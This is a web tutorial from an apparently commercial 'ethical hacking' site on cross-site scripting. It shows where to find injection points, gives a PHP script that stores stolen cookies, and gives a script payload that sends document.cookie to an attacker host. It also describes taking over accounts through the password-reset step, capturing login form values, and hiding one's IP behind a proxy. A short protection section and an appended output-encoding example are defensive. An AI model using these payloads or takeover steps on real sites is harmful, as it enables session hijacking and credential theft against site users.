Extreme Hacking
Advanced Ethical Hacking Institute in Pune
Cross-site scripting attacks (CSS-XSS)
Note 1: This tutorial requires only basic knowledge of HTML, JavaScript and PHP.
Note 2: Which language you use to exploit the vulnerability on your "thief" site is your choice. I use PHP.
1.Introduction
2.Finding vulnerabilities
3.Exploiting vulnerabilities
4.Protecting your site
—-1.Introduction—-
CSS attacks are the easiest attacks one can use against a site. When you attack a site this way, you manage to install a script on it and have it run every time a user or guest visits the site, moves the mouse over a link, clicks it, and so on. Once the script is installed on the site, the rest is easy.
—-2.Finding vulnerabilities—-
As I mentioned above, the hard part is finding the vulnerable spot on the site. Most CSS tutorials start with something like "having a vulnerable guestbook...". I mean, what is the point of having users if you have a guestbook that allows HTML code? So our approach is going to be a little different, and definitely not with a guestbook.
The only way to insert something into a website is if the website allows you to insert it. This means that you have to find a form that asks you to insert content. No... are you kidding??? OK, I know that you all got that by now. So it is logical that you don't only want to insert content on the site; you also want your content displayed. That means you have to find a form that displays the inserted content. The most common such form is a guestbook or a forum. But guess what: they are (almost) always protected. So you have to find something else. Common things that are displayed in web pages are:
a. —Usernames—
Usually protected, but not always...
b. —User's web pages (displayed on others' sites)—
The links that allow you to write a name for the link might be vulnerable.
c. —Image displays—
That one is quite good. It is the place where a site allows you to write a link for your picture. Sometimes it is not protected, so all you have to do is write your image, close the <img> tag and then write your script.
d. —Failed logins—
I almost forgot those. Example: "No user 'asadh' found". What would happen if you wrote <script>……..</script> for a username? Nice, because you can get the pass straight away, but rare, really rare.
e. —Search engines—
Example: "No entries found for 'asdas'". Likewise, what would happen if you wrote <script>……..</script> for an entry?
OK, enough with those. Now the most important thing is to be able to examine a site and find its CSS vulnerability or determine that it has none. This means that finding a vulnerability depends on the capability of the "attacker".
—-3.Exploiting vulnerabilities—-
OK, now we have a vulnerable site and we can install any script we want. What do we install? A "hello" alert box? No. We send the user to a site of our own, which can be on any free server, that does the dirty work for us...
What we can get from our exploit depends on where it sits on the site and on the structure of the site.
Suppose our site is http://www.thief.com/steal.php and we have found a vulnerability somewhere on another site. We want to log in as another user; all we need is this user's cookie, whether it is 'Session' or 'pass' or 'user'. So here is our simple PHP code, which most of you who know any server-side scripting language have already thought of.
<?php
//Connect to database
$con = mysql_connect(servername,username,password);
mysql_select_db("my_db", $con);
//Insert cookie values at database
mysql_query("INSERT INTO table_name (cookieuser,…)
VALUES ('".$_GET['cuser']."',….)");
//Go back where we were
echo '<script>document.location = "the other site"</script>';
?>
OK, now it's easy to think of the script that we need to have executed.
<script>document.location="www.thief.com/steal.php?cuser="+document.cookie</script>
Good, now we are logged in as another user; do as you like. But does that really help us? Yes, if all we wanted was to log in to this site as somebody else. But what I would do is go to the user's profile, change his e-mail address to mine and hit the "Forgot your password" link that exists on most sites. And there you go: the site has e-mailed you the password.
But there is also a possibility that you can get the pass straight away, if the vulnerability is in the login form. Then you can add an onsubmit="….." and execute the script, only this time, instead of document.cookie, send document.forms[0].user.value and document.forms[0].password.value as parameters to your page. And you have what you need.
Also here, as in finding the vulnerabilities, don't forget to improvise, test and try things depending on what you want to achieve.
—-4.Protecting your site—-
OK, that's the easiest thing of all, but only if you code your own stuff. You must either use the predefined functions of each language that strip the HTML tags everywhere, or replace the symbols < , > with &lt; , &gt; each time you display something (that comes from a user) on your site. If you use other people's stuff, just check it before you upload it to your site. Well, I really think that I should omit this part, because everyone who knows how to attack a site knows how to protect it from this attack.
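The encoding step described above, as an added example that is not part of the original tutorial: a PHP sketch that renders the "No entries found" message and a user-supplied picture link with and without htmlspecialchars(). The function names, the fallback image path and the sample inputs are constructed for illustration.

```php
<?php
// Added example: output encoding for the display points listed in section 2.
// Function names, the fallback path and the sample inputs are constructed.

// Encode a user-supplied value for HTML text or a quoted attribute.
// ENT_QUOTES also encodes ' and ", which matters inside attributes.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// "No entries found for '...'" message (search box, failed login).
function notFoundUnsafe(string $term): string
{
    return "<p>No entries found for '" . $term . "'</p>";   // reflects markup as-is
}

function notFoundSafe(string $term): string
{
    return "<p>No entries found for '" . e($term) . "'</p>";
}

// User-supplied picture link: allow only http(s) URLs, then encode the
// value so it cannot close the src attribute or the <img> tag.
function avatarTag(string $url): string
{
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return '<img src="/img/default.png" alt="avatar">'; // hypothetical fallback
    }
    return '<img src="' . e($url) . '" alt="avatar">';
}

// Constructed sample inputs: plain text, markup, and an attribute break-out.
$samples = [
    'plain term',
    '<b>bold</b>',
    'pic.png"><i>x</i>',
];
foreach ($samples as $s) {
    echo "input : $s\n";
    echo "unsafe: " . notFoundUnsafe($s) . "\n";
    echo "safe  : " . notFoundSafe($s) . "\n";
}
echo avatarTag('https://example.com/pic.png"><i>x</i>') . "\n";
echo avatarTag('javascript:void(0)') . "\n";
```

Stripping tags alone does not protect a value placed inside an attribute, since a quote character is enough to end the attribute; encoding with ENT_QUOTES covers that case.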
In conclusion, I should note to everyone that when you find those vulnerabilities you must not use them, but inform the owner of the site so that he can correct them. I also forgot to tell you that you should use some proxy when you try these things out, because not revealing your IP is always better.
www.extremehacking.org